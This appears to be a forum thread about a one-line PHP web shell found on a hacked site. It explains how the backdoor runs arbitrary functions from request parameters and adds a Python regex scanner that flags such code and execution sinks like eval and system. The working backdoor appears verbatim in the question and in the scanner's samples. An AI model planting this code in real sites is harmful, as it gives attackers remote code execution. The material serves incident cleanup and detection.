I found a line of script left by the hacker in one of my PHP files. And it reads like this:
<?php
($_=@$_GET[2]).@$_($_POST[1]);
?>
Can anyone please give some hints about what this line of code does? Thank you
As Reeno already said in a comment, it's like a PHP shell.
Store the GET variable with the key '2' in a variable called $_. Due to PHP's nature of weak typing, we do not need quotes around the number.
$_=@$_GET[2]
Treat $_ as a callable function name and execute it with $_POST[1] as the first argument.
@$_($_POST[1])
The @ operators should suppress error logging, see PHP.net: Error Control Operators.
The concatenation operator between the two statements actually does nothing important. It could be rewritten like this:
$_=@$_GET[2];
@$_($_POST[1]);
Calling arbitrary functions. I won't mention the specific HTTP headers for a successful attack, but this should be fairly easy for every (web) programmer.
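For anyone cleaning up after a find like this, the useful next step is to check the rest of the web root for the same construction: request data stored in a variable that is later invoked as a function, request data called directly as a function, or a known code-execution sink such as eval() fed straight from $_GET/$_POST. The following Python scanner is an added example (not code from the question or the answer above); it uses regular-expression heuristics rather than a real PHP parser, so treat its output as a list of files to read by hand, not as proof either way. The sample PHP files it scans are constructed inline, and the function and variable names are the example's own.

```python
"""Heuristic scan of PHP sources for the "variable function over request data"
backdoor pattern discussed in the thread. Added example; regex-based, not a
PHP parser, so expect some false positives and negatives."""
import re
import tempfile
from pathlib import Path

# Constructed sample files: the one-liner from the question, a spread-out
# variant of the same idea, and a benign page that only reads $_GET.
SAMPLES = {
    "backdoor.php": "<?php\n($_=@$_GET[2]).@$_($_POST[1]);\n?>\n",
    "spread.php": "<?php\n$fn = $_REQUEST['a'];\n// later in the file\n$fn($_REQUEST['b']);\n",
    "index.php": "<?php\necho htmlspecialchars($_GET['q'] ?? '');\n?>\n",
}

SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]"
VARNAME = r"\$[A-Za-z_][A-Za-z0-9_]*"

# Request data invoked directly as a function: $_GET['f']($_POST['a'])
DIRECT_CALL = re.compile(r"@?" + SUPERGLOBAL + r"\s*\(")
# Request data assigned to a variable: ($_=@$_GET[2]) or $fn = $_REQUEST['a']
ASSIGN = re.compile(r"(" + VARNAME + r")\s*=\s*@?" + SUPERGLOBAL)
# Well-known execution sinks whose first argument comes straight from a request
SINKS = re.compile(
    r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen|create_function)"
    r"\s*\(\s*@?" + SUPERGLOBAL
)


def scan_source(src: str) -> list[str]:
    """Return human-readable findings for one PHP source string (empty if clean)."""
    findings = []
    # Variable names that receive request data anywhere in the file ("$_" in the thread).
    tainted = {m.group(1) for m in ASSIGN.finditer(src)}
    for lineno, line in enumerate(src.splitlines(), 1):
        if DIRECT_CALL.search(line):
            findings.append(f"line {lineno}: request value called directly as a function")
        if SINKS.search(line):
            findings.append(f"line {lineno}: code-execution sink fed straight from request data")
        for name in sorted(tainted):
            # The tainted variable followed by "(" is the variable-function call.
            if re.search(r"@?" + re.escape(name) + r"\s*\(", line):
                findings.append(
                    f"line {lineno}: {name} holds request data and is invoked as a function"
                )
    return findings


def scan_files(paths) -> dict[str, list[str]]:
    """Scan each path on disk; map filenames with findings to their finding lists."""
    report = {}
    for p in paths:
        hits = scan_source(Path(p).read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(p)] = hits
    return report


if __name__ == "__main__":
    # Write the constructed samples to a temp directory and scan it like a web root.
    with tempfile.TemporaryDirectory() as root:
        for name, body in SAMPLES.items():
            Path(root, name).write_text(body, encoding="utf-8")
        for path, hits in scan_files(sorted(Path(root).glob("*.php"))).items():
            print(path)
            for hit in hits:
                print("  ", hit)
```

In a real cleanup, run it over the whole document root (for example `scan_files(Path("/var/www").rglob("*.php"))`) and review every flagged file in full: a backdoor found in one file is usually accompanied by others, and the assignment and the call can be far apart, which is why the scanner collects tainted names across the entire file before looking for calls.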